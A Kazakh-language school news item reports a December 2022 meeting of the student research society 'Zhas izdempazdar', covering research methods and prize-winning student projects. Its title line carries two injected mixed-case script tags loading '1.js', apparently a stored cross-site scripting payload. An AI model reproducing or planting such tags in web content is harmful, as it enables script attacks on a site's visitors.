«Жас іздемпаздар» оқушылардың ғылыми қоғамы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.12.2022

     2022 жылдың 1-желтоқсан күні жетекшісі Абдуалиева К. Е. «Жас іздемпаздар» оқушылардың ғылыми қоғамының кезекті отырысын өткізді. Отырысқа мектепте ғылыми жобалар мен зерттеу жұмыстарымен айналысатың оқушылар мен жетекшілері қатысты. «Зерттеу деген не? Зерттеуді ұйымдастыру. Тақырыпты таңдау» - деген сұрақтар талданды. Жұмыс барысында ғалымдар зерттеулерін неден бастайды, зерттеу тәсілдері, тақырыптар түрлері туралы анықталды. Оқушылар екі топқа бөлініп, эксперимент жасап, өздерінің ойларымен бөлісті. Отырыстың екінші бөлігінде облыстық ғылыми жобалар сайысында жүлделі орындарға ие болған Ахметова Гульмира (9 сынып) «Неологизмы в русском языке, неологизмы COVID-a», Асылкулова Мадина (10 сынып) «Менің ауылымның экологиялық мәселелері», Ибрашева Жасмина (11 сынып) «Пластик өнімдерін кәдеге жарату» тақырыптарында жұмыстары туралы  жан-жақты ақпарат берді.

Просмотров: 596


Пікір қосу



Деректерді қолтаңбаға қосу